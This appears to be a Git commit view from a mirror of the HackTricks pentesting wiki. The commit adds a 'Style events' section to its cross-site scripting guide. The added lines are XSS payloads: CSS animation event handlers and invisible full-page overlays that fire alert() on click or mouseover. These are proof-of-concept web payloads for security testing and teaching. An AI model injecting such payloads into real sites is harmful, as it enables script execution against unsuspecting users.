0x22bb
/
hacktricks
mirror of https://github.com/carlospolop/hacktricks.git
1
2
Fork 0
Code Releases Activity

GitBook: [master] one page modified

This commit is contained in:
CPol 2021-02-25 11:06:26 +00:00 committed by gitbook-bot
parent b3d7d120b5
commit 7517161d89
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
1 changed files with 12 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
pentesting-web/xss-cross-site-scripting/README.md
View File

@ -190,6 +190,18 @@ If you **cannot escape from the tag**, you could create new attributes inside th
" autofocus onfocus=alert(document.domain) x="
```
#### Style events
```python
<p style="animation: x;" onanimationstart="alert()">XSS</p>
<p style="animation: x;" onanimationend="alert()">XSS</p>
#ayload that injects an invisible overlay that will trigger a payload if anywhere on the page is clicked:
<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.5);z-index: 5000;" onclick="alert(1)"></div>
#moving your mouse anywhere over the page (0-click-ish):
<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.0);z-index: 5000;" onmouseover="alert(1)"></div>
```
### Within the attribute
Even if you **cannot escape from the attribute** \(`"` is being encoded or deleted\), depending on **which attribute** your value is being reflected in **if you control all the value or just a part** you will be able to abuse it. For **example**, if you control an event like `onclick=` you will be able to make it execute arbitrary code when it's clicked.